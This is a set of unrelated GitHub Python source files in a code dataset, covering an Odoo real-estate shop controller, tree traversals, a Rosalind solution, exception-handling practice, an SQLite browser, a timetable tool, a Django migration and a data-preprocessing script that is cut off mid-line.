print(\"\\n\\n\")\n\n\n\n","repo_name":"maybetonyfu/lof","sub_path":"src/marco.py","file_name":"marco.py","file_ext":"py","file_size_in_byte":7416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"14745277299","text":"from odoo import http\nfrom odoo.http import request\nfrom odoo.addons.website.controllers.main import QueryURL\nfrom odoo.addons.http_routing.models.ir_http import slug\n\nPPG = 20 # Properties Per Page\nPPR = 4 # Properties Per Row\nclass TableCompute(object):\n\n def __init__(self):\n self.table = {}\n\n def _check_place(self, posx, posy, sizex, sizey):\n res = True\n for y in range(sizey):\n for x in range(sizex):\n if posx + x >= PPR:\n res = False\n break\n row = self.table.setdefault(posy + y, {})\n if row.setdefault(posx + x) is not None:\n res = False\n break\n for x in range(PPR):\n self.table[posy + y].setdefault(x, None)\n return res\n\n def process(self, products, ppg=PPG):\n # Compute products positions on the grid\n minpos = 0\n index = 0\n maxy = 0\n x = 0\n for p in products:\n x = min(max(p.website_size_x, 1), PPR)\n y = min(max(p.website_size_y, 1), PPR)\n if index >= ppg:\n x = y = 1\n\n pos = minpos\n while not self._check_place(pos % PPR, pos // PPR, x, y):\n pos += 1\n # if 21st products (index 20) and the last line is full (PPR products in it), break\n # (pos + 1.0) / PPR is the line where the product would be inserted\n # maxy is the number of existing lines\n # + 1.0 is because pos begins at 0, thus pos 20 is actually the 21st block\n # and to force python to not round the division operation\n if index >= ppg and ((pos + 1.0) // PPR) > maxy:\n break\n\n if x == 1 and y == 1: # simple heuristic for CPU optimization\n minpos = pos // PPR\n\n for y2 in range(y):\n for x2 in range(x):\n self.table[(pos // PPR) + y2][(pos % PPR) + x2] = False\n self.table[pos // PPR][pos % PPR] = {\n 'product': p, 'x': x, 'y': y,\n 'class': \" \".join(x.html_class for x in p.website_style_ids if x.html_class)\n }\n if index <= ppg:\n maxy = max(maxy, y + (pos // PPR))\n index += 1\n\n # Format table according to HTML needs\n rows = sorted(self.table.items())\n rows = [r[1] for r in rows]\n for col in range(len(rows)):\n cols = sorted(rows[col].items())\n x += len(cols)\n rows[col] = [r[1] for r in cols if r[1]]\n\n return rows\n\nclass WebsiteProductImage(http.Controller):\n\n @http.route(['/product/image_effect_config'], type='json', auth=\"public\", website=True)\n def get_image_effect_config(self):\n cur_website = request.website\n values = {\n 'no_extra_options': cur_website.no_extra_options,\n 'theme_panel_position': cur_website.thumbnail_panel_position,\n 'interval_play': cur_website.interval_play,\n 'enable_disable_text': cur_website.enable_disable_text,\n 'color_opt_thumbnail': cur_website.color_opt_thumbnail,\n 'change_thumbnail_size': cur_website.change_thumbnail_size,\n 'thumb_height': cur_website.thumb_height,\n 'thumb_width': cur_website.thumb_width,\n }\n return values\n\n def _get_search_order(self, post):\n # OrderBy will be parsed in orm and so no direct sql injection\n # id is added to be sure that order is a unique sort key\n return 'website_published desc,%s , id desc' % post.get('order', 'website_sequence desc')\n\n def _get_compute_currency_and_context(self):\n pricelist_context = dict(request.env.context)\n pricelist = False\n if not pricelist_context.get('pricelist'):\n pricelist = request.website.get_current_pricelist()\n pricelist_context['pricelist'] = pricelist.id\n else:\n pricelist = request.env['product.pricelist'].browse(pricelist_context['pricelist'])\n\n from_currency = request.env.user.company_id.currency_id\n to_currency = pricelist.currency_id\n compute_currency = lambda price: from_currency.compute(price, to_currency)\n\n return compute_currency, pricelist_context, pricelist\n\n\n def _get_search_domain(self, search, category, attrib_values):\n domain = request.website.sale_property_domain()\n if search:\n for srch in search.split(\" \"):\n domain += [\n '|', '|', '|', ('name', 'ilike', srch), ('description', 'ilike', srch),\n ('description_sale', 'ilike', srch), ('product_variant_ids.default_code', 'ilike', srch)]\n\n if category:\n domain += [('public_categ_ids', 'child_of', int(category))]\n\n if attrib_values:\n attrib = None\n ids = []\n for value in attrib_values:\n if not attrib:\n attrib = value[0]\n ids.append(value[1])\n elif value[0] == attrib:\n ids.append(value[1])\n else:\n domain += [('attribute_line_ids.value_ids', 'in', ids)]\n attrib = value[0]\n ids = [value[1]]\n if attrib:\n domain += [('attribute_line_ids.value_ids', 'in', ids)]\n\n return domain\n\n @http.route([\n '/property',\n '/property/page/',\n '/property/category/',\n '/property/category//page/'\n ], type='http', auth=\"public\", website=True)\n def property(self, page=0, category=None, search='', ppg=False, **post):\n if ppg:\n try:\n ppg = int(ppg)\n except ValueError:\n ppg = PPG\n post[\"ppg\"] = ppg\n else:\n ppg = PPG\n\n attrib_list = request.httprequest.args.getlist('attrib')\n attrib_values = [[int(x) for x in v.split(\"-\")] for v in attrib_list if v]\n attributes_ids = {v[0] for v in attrib_values}\n attrib_set = {v[1] for v in attrib_values}\n\n domain = self._get_search_domain(search, category, attrib_values)\n\n keep = QueryURL('/property', category=category and int(category), search=search, attrib=attrib_list, order=post.get('order'))\n\n compute_currency, pricelist_context, pricelist = self._get_compute_currency_and_context()\n\n request.context = dict(request.context, pricelist=pricelist.id, partner=request.env.user.partner_id)\n\n url = \"/property\"\n if search:\n post[\"search\"] = search\n if category:\n category = request.env['product.public.category'].browse(int(category))\n url = \"/property/category/%s\" % slug(category)\n if attrib_list:\n post['attrib'] = attrib_list\n\n categs = request.env['product.public.category'].search([('parent_id', '=', False)])\n Product = request.env['product.template']\n\n parent_category_ids = []\n if category:\n parent_category_ids = [category.id]\n current_category = category\n while current_category.parent_id:\n parent_category_ids.append(current_category.parent_id.id)\n current_category = current_category.parent_id\n\n product_count = Product.search_count(domain)\n pager = request.website.pager(url=url, total=product_count, page=page, step=ppg, scope=7, url_args=post)\n products = Product.search(domain, limit=ppg, offset=pager['offset'], order=self._get_search_order(post))\n\n ProductAttribute = request.env['product.attribute']\n if products:\n # get all products without limit\n selected_products = Product.search(domain, limit=False)\n attributes = ProductAttribute.search([('attribute_line_ids.product_tmpl_id', 'in', selected_products.ids)])\n else:\n attributes = ProductAttribute.browse(attributes_ids)\n\n values = {\n 'search': search,\n 'category': category,\n 'attrib_values': attrib_values,\n 'attrib_set': attrib_set,\n 'pager': pager,\n 'pricelist': pricelist,\n 'products': products,\n 'search_count': product_count, # common for all searchbox\n 'bins': TableCompute().process(products, ppg),\n 'rows': PPR,\n 'categories': categs,\n 'attributes': attributes,\n 'compute_currency': compute_currency,\n 'keep': keep,\n 'parent_category_ids': parent_category_ids,\n }\n if category:\n values['main_object'] = category\n return request.render(\"website_sale.products\", values)\n","repo_name":"odoo-modules/realestate","sub_path":"itsys_real_estate/controllers/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8893,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"15802406941","text":"class Node:\n def __init__(self, data):\n self.data = data\n self.left = None\n self.right = None\n\n\ndef createBST(root, newNode):\n if root is None:\n return root\n\n if newNode.data < root.data:\n if root.left is None:\n root.left = newNode\n else:\n createBST(root.left, newNode)\n else:\n if root.right is None:\n root.right = newNode\n else:\n createBST(root.right, newNode)\n \n\ndef preOrrderTraversal(root):\n if root:\n print(root.data)\n preOrrderTraversal(root.left)\n preOrrderTraversal(root.right)\n\ndef bfsTraversal(root):\n queue = []\n queue.append(root)\n while(len(queue) > 0):\n root = queue.pop(0)\n print(root.data, end=\" \")\n if root.left is not None:\n queue.append(root.left)\n if root.right is not None:\n queue.append(root.right)\n \n\ndef InOrrderTraversal(root):\n if root:\n InOrrderTraversal(root.left)\n print(root.data)\n InOrrderTraversal(root.right)\n\ndef inOrderWithoutRecursion(root):\n queue = []\n current = root\n while True:\n if current is not None:\n queue.append(current)\n current = current.left\n elif(queue):\n current = queue.pop()\n print(current.data)\n current = current.right\n else:\n break\n\nroot = Node(4)\ncreateBST(root, Node(5))\ncreateBST(root, Node(2))\ncreateBST(root, Node(1))\ncreateBST(root, Node(3))\n# preOrrderTraversal(root)\n# bfsTraversal(root)\n# InOrrderTraversal(root)\ninOrderWithoutRecursion(root)","repo_name":"AnchalNigam/Code-Time","sub_path":"BSTRevision.py","file_name":"BSTRevision.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"36344465589","text":"from logging import getLogger\nfrom typing import Optional, List, Tuple\n\nfrom pyramid.request import Request\nfrom pyramid.security import Allow, Everyone, ALL_PERMISSIONS\n\nfrom openprocurement.tender.core.procedure.utils import get_items\nfrom openprocurement.tender.core.procedure.views.base import TenderBaseResource\nfrom openprocurement.api.utils import context_unpack, json_view\nfrom openprocurement.tender.core.procedure.utils import save_tender, set_item\nfrom openprocurement.tender.core.procedure.serializers.criterion_rg_requirement_evidence import (\n EligibleEvidenceSerializer,\n)\nfrom openprocurement.tender.core.procedure.state.criterion_rq_requirement_evidence import EligibleEvidenceState\nfrom openprocurement.tender.core.procedure.models.criterion import (\n EligibleEvidence,\n PatchEligibleEvidence\n)\nfrom openprocurement.tender.core.procedure.views.criterion_rg_requirement import (\n resolve_criterion,\n resolve_requirement_group,\n resolve_requirement,\n)\nfrom openprocurement.tender.core.procedure.validation import (\n unless_administrator,\n validate_item_owner,\n validate_input_data,\n validate_patch_data_simple,\n)\n\n\nLOGGER = getLogger(__name__)\n\n\ndef resolve_eligible_evidence(request: Request) -> None:\n match_dict = request.matchdict\n if match_dict.get(\"evidence_id\"):\n evidence_id = match_dict[\"evidence_id\"]\n evidences = get_items(\n request,\n request.validated[\"requirement\"],\n \"eligibleEvidences\",\n evidence_id,\n )\n request.validated[\"evidence\"] = evidences[0]\n\n\nclass BaseEligibleEvidenceResource(TenderBaseResource):\n\n def __acl__(self) -> List[Tuple[str, str, str]]:\n return [\n (Allow, Everyone, \"view_tender\"),\n (Allow, \"g:brokers\", \"create_evidence\"),\n (Allow, \"g:brokers\", \"edit_evidence\"),\n (Allow, \"g:Administrator\", \"edit_evidence\"),\n (Allow, \"g:admins\", ALL_PERMISSIONS),\n ]\n\n serializer_class = EligibleEvidenceSerializer\n state_class = EligibleEvidenceState\n\n def __init__(self, request: Request, context=None) -> None:\n super().__init__(request, context)\n if context and request.matchdict:\n resolve_criterion(request)\n resolve_requirement_group(request)\n resolve_requirement(request)\n resolve_eligible_evidence(request)\n\n @json_view(\n content_type=\"application/json\",\n validators=(\n unless_administrator(validate_item_owner(\"tender\")),\n validate_input_data(EligibleEvidence),\n ),\n permission=\"create_evidence\",\n )\n def collection_post(self) -> Optional[dict]:\n\n evidence = self.request.validated[\"data\"]\n requirement = self.request.validated[\"requirement\"]\n\n if \"eligibleEvidences\" not in requirement:\n requirement[\"eligibleEvidences\"] = []\n requirement[\"eligibleEvidences\"].append(evidence)\n\n self.state.evidence_on_post(requirement)\n\n if save_tender(self.request):\n self.LOGGER.info(\n f\"Created requirement eligible evidence {evidence['id']}\",\n extra=context_unpack(\n self.request,\n {\"MESSAGE_ID\": \"requirement_eligible_evidence_create\"},\n {\"evidence_id\": evidence[\"id\"]},\n ),\n )\n tender = self.request.validated[\"tender\"]\n match_dict = self.request.matchdict\n self.request.response.status = 201\n self.request.response.headers[\"Location\"] = self.request.route_url(\n f\"{tender['procurementMethodType']}:Requirement Eligible Evidence\",\n tender_id=match_dict.get(\"tender_id\"),\n criterion_id=match_dict.get(\"criterion_id\"),\n requirement_group_id=match_dict.get(\"requirement_group_id\"),\n requirement_id=match_dict.get(\"requirement_id\"),\n evidence_id=evidence[\"id\"],\n )\n return {\"data\": self.serializer_class(evidence).data}\n\n @json_view(permission=\"view_tender\")\n def collection_get(self) -> dict:\n requirement = self.request.validated[\"requirement\"]\n data = tuple(self.serializer_class(req).data for req in requirement.get(\"eligibleEvidences\", \"\"))\n return {\"data\": data}\n\n @json_view(permission=\"view_tender\")\n def get(self) -> dict:\n data = self.serializer_class(self.request.validated[\"evidence\"]).data\n return {\"data\": data}\n\n @json_view(\n content_type=\"application/json\",\n validators=(\n unless_administrator(validate_item_owner(\"tender\")),\n validate_input_data(PatchEligibleEvidence),\n validate_patch_data_simple(EligibleEvidence, \"evidence\"),\n ),\n permission=\"edit_evidence\",\n )\n def patch(self) -> Optional[dict]:\n updated_evidence = self.request.validated[\"data\"]\n if not updated_evidence:\n return\n evidence = self.request.validated[\"evidence\"]\n requirement = self.request.validated[\"requirement\"]\n\n self.state.evidence_on_patch(evidence, updated_evidence)\n\n set_item(requirement, \"eligibleEvidences\", evidence[\"id\"], updated_evidence)\n\n if save_tender(self.request):\n self.LOGGER.info(\n f\"Updated requirement eligible evidence {evidence['id']}\",\n extra=context_unpack(self.request, {\"MESSAGE_ID\": \"requirement_eligible_evidence_patch\"}),\n )\n return {\"data\": self.serializer_class(updated_evidence).data}\n\n @json_view(\n validators=(unless_administrator(validate_item_owner(\"tender\"))),\n permission=\"edit_evidence\",\n )\n def delete(self):\n evidence = self.request.validated[\"evidence\"]\n requirement = self.request.validated[\"requirement\"]\n\n self.state.evidence_on_delete(evidence)\n\n requirement[\"eligibleEvidences\"].remove(evidence)\n if not requirement[\"eligibleEvidences\"]:\n del requirement[\"eligibleEvidences\"]\n\n if save_tender(self.request, modified=False):\n self.LOGGER.info(\n f\"Deleted requirement eligible evidence {evidence['id']}\",\n extra=context_unpack(self.request, {\"MESSAGE_ID\": \"requirement_eligible_evidence_delete\"}),\n )\n return {\"data\": self.serializer_class(evidence).data}\n","repo_name":"ProzorroUKR/openprocurement.api","sub_path":"src/openprocurement/tender/core/procedure/views/criterion_rg_requirement_evidence.py","file_name":"criterion_rg_requirement_evidence.py","file_ext":"py","file_size_in_byte":6467,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"75"} +{"seq_id":"39739283097","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('music', '0004_auto_20140826_0130'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='video',\n name='preview_url',\n field=models.URLField(blank=True, default='http://placehold.it/480x360&text=[preview]', help_text='A link to the preview image.'),\n preserve_default=False,\n ),\n ]\n","repo_name":"bhrutledge/jahhills.com","sub_path":"hth/music/migrations/0005_video_preview_url.py","file_name":"0005_video_preview_url.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"20355207732","text":"import zeep\nfrom pandas import DataFrame\nfrom concurrent.futures import ThreadPoolExecutor, as_completed\n\ndef flatten(dictionary, parent_key='', sep='_'):\n items = []\n for k, v in dictionary.items():\n new_key = f\"{parent_key}{sep}{k}\" if parent_key else k\n if isinstance(v, dict):\n items.extend(flatten(v, new_key, sep=sep).items())\n else:\n items.append((new_key, v))\n return dict(items)\n\ndef process_batch(batch):\n return [flatten(item) for item in batch]\n\ndef batch_process(response, batch_size=1000):\n for i in range(0, len(response), batch_size):\n yield response[i:i + batch_size]\n\n# Replace 'your_soap_service_url' and 'your_soap_method' with your actual SOAP service URL and method\nclient = zeep.Client(wsdl='your_soap_service_url')\nresponse = client.service.your_soap_method()\n\n# Assuming the response is a list of dictionaries\nflattened_data = []\nwith ThreadPoolExecutor() as executor:\n futures = [executor.submit(process_batch, batch) for batch in batch_process(response)]\n for future in as_completed(futures):\n flattened_data.extend(future.result())\n\n# Convert to DataFrame\ndf = DataFrame(flattened_data)\n","repo_name":"ashar19-main/python_data_utilities","sub_path":"soap_api_response_reader_ex.py","file_name":"soap_api_response_reader_ex.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"71085469682","text":"'''\nMy solution to Rosalind Bioinformatics Problem 030\n\nTitle: Finding a Spliced Motif\nRosalind ID: SSEQ\nRosalind #: 030\nURL: http://rosalind.info/problems/sseq\n\nGoal - Provided indicies of the nucleotides of a string t in string s.\n'''\n\nfrom Bio import SeqIO\n\nf = open(\"data/rosalind_sseq.txt\", 'r')\nrecords = list(SeqIO.parse(f, \"fasta\"))\nf.close()\n\ns = str(records[0].seq)\nt = str(records[1].seq)\n\nindicies = []\nindex = 0\nfor nt in t:\n s_temp = s[index:]\n # get index of nucleotide, add prior index to keep position\n index = s_temp.index(nt) + 1 + index\n indicies.append(index)\n\no = open(\"output/030_SSEQ.txt\", 'w')\no.write(\" \".join(map(str, indicies)))\no.close()\n \n","repo_name":"cdeterman/Rosalind","sub_path":"030_SSEQ/030_SSEQ.py","file_name":"030_SSEQ.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"75"} +{"seq_id":"36688225923","text":"\ndef err():\n\n a,b = 10,'ab'\n # c = a + b\n # c = a/0\n import csv30\n\ndef release_resource():\n print(\"released resource\")\n\ndef key_err():\n print(\" Program started........\")\n ## Perform some logical operation\n try:\n # l1 = [10,20,30]\n # n = input(\"Enter number:\")\n # n = int(n)\n # c = n/2\n # print(\"l1:\",l1[5])\n print(\"====================gggggggg\")\n return 10\n except KeyboardInterrupt:\n print(\"Exception occured\")\n except ZeroDivisionError:\n print(\"Zero division error occured\")\n except Exception:\n print(\"main Exception occurred\")\n else:\n print(\"No exception occured\")\n finally:\n release_resource()\n\n\n print(\"Program End....\")\n\ndef excep1():\n\n print(\" Program started........\")\n ## Perform some logical operation\n try:\n n = 10/0\n print(\"====================gggggggg\")\n return 10\n except (KeyboardInterrupt,ZeroDivisionError,IndexError):\n print(\"Sending notification send_no_manager\") # send_no_manager\n except Exception:\n print(\"main Exception occurred\")\n else:\n print(\"No exception occured\")\n finally:\n release_resource()\n\n\n print(\"Program End....\")\n\n\nclass CustExcep(Exception):\n\n def __init__(self,msg,val):\n self.msg = msg\n self.val = val\n\n def __str__(self):\n return f\"Exception:{self.msg}:{self.val}\"\n\n\n\ndef account():\n balance = 1000\n withdrawl = float(input(\"Enter amount to withdraw:\"))\n\n if withdrawl > balance:\n raise CustExcep(\"Insufficient Balance:\",balance)\n\n balance = balance - withdrawl\n print(f\"Your balance is:{balance}, withdrwal amount:{withdrawl}\")\n\n\ndef main():\n print(\"ATM Sessiuon started\")\n try:\n account()\n\n except CustExcep as e1:\n print(e1)\n else:\n print(\"Your session executed successfully\")\n finally:\n release_resource()\n\n print(\" Thank you for visiting ATM\")\n\n\nif __name__ ==\"__main__\":\n # err()\n # key_err()\n # excep1()\n main()","repo_name":"tauovir/Materials","sub_path":"Python Session/project_demo/source_script/practice/Python_30_may.py","file_name":"Python_30_may.py","file_ext":"py","file_size_in_byte":2066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"71509386801","text":"import sys\nimport heapq\n\ninput = sys.stdin.readline\n\nn = int(input())\n\n# heap = []\nleft = float(\"inf\")\ncur = None\nanswer = []\n\nfor i in range(n):\n num = int(input())\n if not cur:\n cur = num\n else:\n if cur != num:\n if (left - cur > 0 and num - cur > 0):\n diff = min(left-cur, num-cur)\n elif left - cur > 0:\n diff = left-cur\n elif num - cur > 0: \n diff = num - cur\n else:\n left = cur\n cur = num\n continue\n answer.append(diff)\n left = cur\n cur = num\n else:\n continue\n\n# print(heap)\n# # while len(heap) >= 2:\n# # num, diff = heapq.heappop(heap)\n# # answer += diff\n\n# # print(answer)\nprint(sum(answer))","repo_name":"uiseop/TIL","sub_path":"알고리즘/구현/2374.py","file_name":"2374.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"8672543113","text":"#start_index = 0\n#line_length = 10\n\nstart_index, line_length = [int(x) for x in input().split()]\n\n\n\ndef get_num_workers(line_length):\n return (line_length * line_length) - 1\n\nend_index = start_index + get_num_workers(line_length)\n\ni = 0\ncounter = line_length\nskips = 0\n\nprint(f\"Start: {start_index}\")\nprint(f\"Line length: {line_length}\")\nprint(f\"Calc End: {end_index}\")\nprint(\"=====================================\")\n\ntrailing_xor = 0\n\nresult = [list()]\n\nwhile (i + start_index) <= end_index:\n if counter == 0:\n result.append(list())\n print(f\"Skip {skips}\")\n i += skips\n skips += 1\n counter = line_length - skips\n print(f\"Allow {counter} more\")\n continue\n else:\n counter -= 1\n \n trailing_xor = trailing_xor ^ (i + start_index)\n print(i + start_index)\n result[-1].append(i + start_index)\n i += 1\n\nprint(\"=====================================\")\nprint(f\"Result: {trailing_xor}\")\n\nfor x in result:\n for num in x:\n print(str(num).ljust(4, \" \"), end=\"\")\n print()\n","repo_name":"Feez/Algo-Challenges","sub_path":"Foobar/QueueToDo-Debug.py","file_name":"QueueToDo-Debug.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"9806706220","text":"import sqlite3\nfrom os.path import isfile\nfrom TableData import TableData\n\n\nclass SQLite: \n\n def __init__(self, path):\n self.path = path\n\n # Open DB and Initialize connection and cursor \n self.update_db_connection_and_data()\n\n def open_db(self):\n \n # If file not exists\n if not isfile(self.path): \n raise(FileNotFoundError)\n\n connection = sqlite3.connect(self.path)\n return connection, connection.cursor()\n\n def get_tables_list(self): \n request = \"select name FROM sqlite_master WHERE type ='table' AND name NOT LIKE 'sqlite_%';\"\n self.cursor.execute(request)\n tables_list = []\n for table in (list(self.cursor.fetchall())):\n tables_list.append(table[0])\n return tables_list\n\n def get_data_from_table(self, table_name: str):\n # Compile request\n request = \"SELECT * FROM '\" + table_name + \"'\"\n \n self.cursor.execute(request)\n\n return self.cursor.fetchall()\n\n def get_column_names(self, table_name: str):\n request = \"PRAGMA table_info('\" + table_name + \"');\"\n answer = self.cursor.execute(request).fetchall()\n\n columns_names = list()\n for column_data in answer:\n columns_names.append(column_data[1])\n return columns_names\n \n @staticmethod\n def process_request(request: str):\n request = request.replace(',', ' ')\n return request\n\n def update_db_connection_and_data(self): \n\n self.connection, self.cursor = self.open_db()\n\n self.tables_list = self.get_tables_list()\n\n self.db_data = dict() # dict : {'table_name' : table_data_object}\n\n for table in self.tables_list:\n data = self.get_data_from_table(table)\n columns = self.get_column_names(table)\n \n table_data = TableData(columns, data)\n\n self.db_data[table] = table_data\n \n def execute_request(self, request):\n try:\n self.cursor.execute(request)\n return self.cursor.fetchall()\n except : \n return RuntimeError\n\nif __name__ == \"__main__\":\n path = \"sqlite_example.db\"\n a = SQLite(path)\n","repo_name":"mv-yurchenko/terminal_db_browser","sub_path":"SQLite.py","file_name":"SQLite.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"2982256916","text":"import json\nimport argparse\nimport shelve\nfrom importlib import import_module\nfrom core.helper import fatal_error, log_info\nfrom core.downloader import download_timetable\nfrom core.usage_info_builder import find_auditoriums_usage\n\n\nclass Defaults:\n DefaultActionName = 'represent'\n DefaultCachePath = 'timetable'\n\n\ndef execute_action(auditoriums_usage, action_name):\n action_module = import_module(f'.{action_name}', 'actions')\n action_func = getattr(action_module, 'action')\n result = action_func(auditoriums_usage)\n return result\n\n\ndef write_result(obj, result_file):\n try:\n f = open(result_file, 'w', encoding='utf-8')\n f.write(json.dumps(obj, ensure_ascii=False, indent=4))\n except OSError as e:\n fatal_error(\"Can not write results: {}\".format(e.strerror))\n\n\ndef main(args):\n cache_path = args.cache_path if args.cache_path else Defaults.DefaultCachePath\n action_name = args.action if args.action else Defaults.DefaultActionName\n output_path = args.output if args.output else f'{action_name}.json'\n\n if not args.skip_check:\n log_info('Loading timetable')\n download_timetable(cache_path)\n timetable_db = shelve.open(cache_path, writeback=True)\n result = find_auditoriums_usage(timetable_db)\n log_info('Executing action')\n result = execute_action(result, action_name)\n log_info('Writing results')\n write_result(result, output_path)\n\n\nif __name__ == '__main__':\n argument_parser = argparse.ArgumentParser(description=\"BSUIR timetable analysis tool\")\n argument_parser.add_argument('--cache-path', type=str, help='path to the cache of a timetable, default is \"timetable\"')\n argument_parser.add_argument('--output', type=str, help='path to the output file, default is .json')\n argument_parser.add_argument('--skip-check', action='store_true', help='skip loading a timetable, use cache')\n argument_parser.add_argument('--action', type=str, help='script to run against built info, default is \"represent\", '+\n 'the file should be placed under \"actions\" folder and have \"action\" function defined with one argument '+\n '(built timetable info will be passed as an argument)')\n\n args = argument_parser.parse_args()\n main(args)","repo_name":"ishimko/bsuir-timetable-analysis","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"19223398308","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom sklearn.cluster import KMeans, DBSCAN\nfrom sklearn.decomposition import PCA\nfrom sklearn.metrics import silhouette_score\nfrom mlxtend.frequent_patterns import apriori, association_rules\nfrom sklearn.preprocessing import LabelEncoder\nimport preprocessing\nimport pandas as pd\nfrom sklearn.utils import resample\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom sklearn.ensemble import RandomForestClassifier\nfrom statsmodels.stats.outliers_influence import variance_inflation_factor\n\nimport seaborn as sns\n\nfrom sklearn.utils import resample\nfrom mlxtend.preprocessing import TransactionEncoder\nfrom mlxtend.frequent_patterns import apriori, association_rules\n# Load data\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n\n\ndf= pd.read_csv('/home/grads/mshutonu/ML_Project/Phase 1/Dataset_final.csv')\nprint(df.head())\n\n\nprint(\"=============Step1: Handling missing values=============\")\nprint(df.isna().sum())\n#print(df.describe().to_csv('describe.csv'))\n\n\nprint(\"=============Step2:Checking and handling duplicate instances==============\")\nduplicated_rows = df[df.duplicated()]\nprint(duplicated_rows.count())\ndf=df.drop_duplicates()\ndf.reset_index(drop=True, inplace=True)\n\n#Encoding string type data\nrem = {\"Male\": 0, \"Female\": 1}\n\ndf['sex']= df['sex'].replace(rem)\nrem2 = {\"N\": 0, \"Y\": 1}\n\ndf['DRK_YN']= df['DRK_YN'].replace(rem2)\n\n\n\n\nprint(\"=============Step3: Anomaly or Outlier Detection===============\")\n\n\ndf_before_outlier= df.shape[0]\n\ncolumns_to_check = [\n \"age\",\n \"height\",\n \"weight\",\n \"waistline\",\n \"sight_left\",\n \"sight_right\",\n \"SBP\",\n \"DBP\",\n \"BLDS\",\n \"tot_chole\",\n \"HDL_chole\",\n \"LDL_chole\",\n \"triglyceride\",\n \"hemoglobin\",\n \"serum_creatinine\",\n \"SGOT_AST\",\n \"SGOT_ALT\",\n \"gamma_GTP\",\n]\n#\nz_scores = (\n df[columns_to_check] - df[columns_to_check].mean()\n) / df[columns_to_check].std()\n\n# 3σ Standart deviation\nthreshold = 3\noutliers = np.abs(z_scores) > threshold\noutlier_columns = outliers.columns[outliers.any()]\ndf_cleaned = df[~outliers.any(axis=1)]\ndf_after_outlier = df_cleaned.shape[0]\n\nprint(\n f\"Due to the removal of outliers the amout of entries reduced from {df_before_outlier} to {df_after_outlier} by {df_before_outlier-df_after_outlier} entries.\"\n)\n\n\nprint(\"=============Step3: Downsampling===============\")\n\n\n\n\n\nminority_class =df['SMK_stat_type_cd'].value_counts().idxmin()\n\n# Separate data by class\nmajority_classes = df[df['SMK_stat_type_cd'] != minority_class]\nminority_class = df[df['SMK_stat_type_cd'] == minority_class]\n\n# Calculate the target count in majority classes\nmajority_class_count = len(majority_classes)\n\n# Downsample each majority class to match the minority class\ndownsampled_majority = pd.DataFrame()\nfor label in majority_classes['SMK_stat_type_cd'].unique():\n majority_class_subset = majority_classes[majority_classes['SMK_stat_type_cd'] == label]\n downsampled_class = resample(majority_class_subset, replace=False, n_samples=len(minority_class), random_state=42)\n downsampled_majority = pd.concat([downsampled_majority, downsampled_class])\n\n# Combine classes\nbalanced_data = pd.concat([downsampled_majority, minority_class])\n\n# Shuffle the data\nbalanced_data = balanced_data.sample(frac=1, random_state=42).reset_index(drop=True)\n\n\n\n\n\n\nprint(\"=============Step4:Discretization & Binarization:one hot encoding===================\")\nbalanced_data=pd.get_dummies(balanced_data,columns=['sex', 'hear_left','hear_right', 'urine_protein'],drop_first=True ).astype(int)\nprint(\"Data after OHE:\", balanced_data.head().to_string())\nprint(\"=============Step6:Variable Transformation: Normalization, standardization===================\")\nnum_cols=[ \"age\",\n \"height\",\n \"weight\",\n \"waistline\",\n \"sight_left\",\n \"sight_right\",\n \"SBP\",\n \"DBP\",\n \"BLDS\",\n \"tot_chole\",\n \"HDL_chole\",\n \"LDL_chole\",\n \"triglyceride\",\n \"hemoglobin\",\n \"serum_creatinine\",\n \"SGOT_AST\",\n \"SGOT_ALT\",\n \"gamma_GTP\",]\nbalanced_data_standardized=balanced_data\nfor col in num_cols:\n balanced_data_standardized[col] = (balanced_data_standardized[col]-balanced_data_standardized[col].mean())/balanced_data_standardized[col].std()\nprint(\"Data after Standardization:\", balanced_data_standardized.head().to_string())\n\n\nprint(\"=============Step5:Dimensionality Reduction/Feature Selection===================\")\n\nX = balanced_data_standardized.drop(['DRK_YN','SMK_stat_type_cd' ], axis=1, inplace=False)\ny=balanced_data_standardized[\"SMK_stat_type_cd\"]\n\n\n#random forest feature importance\n\n\n\n\n\nprint(\"------Method 2:Random Forest Feature Importance (threshold 0.01)-------\")\n\nrf = RandomForestClassifier(random_state=42)\nrf.fit(X, y)\n\n\nFeature_importances = rf.feature_importances_\nfeatures = X.columns\nsorted_indices = np.argsort(Feature_importances)\n\n\nthreshold = 0.01\n\nselected_features_rf=[]\neliminated_features_rf=[]\n\nfor feature, importance in zip(features,Feature_importances):\n if importance>threshold:\n selected_features_rf.append(feature)\n else:\n eliminated_features_rf.append(feature)\n\nprint(\"Eliminated Features:\")\nprint(eliminated_features_rf)\nprint(\"\\nFinal Selected 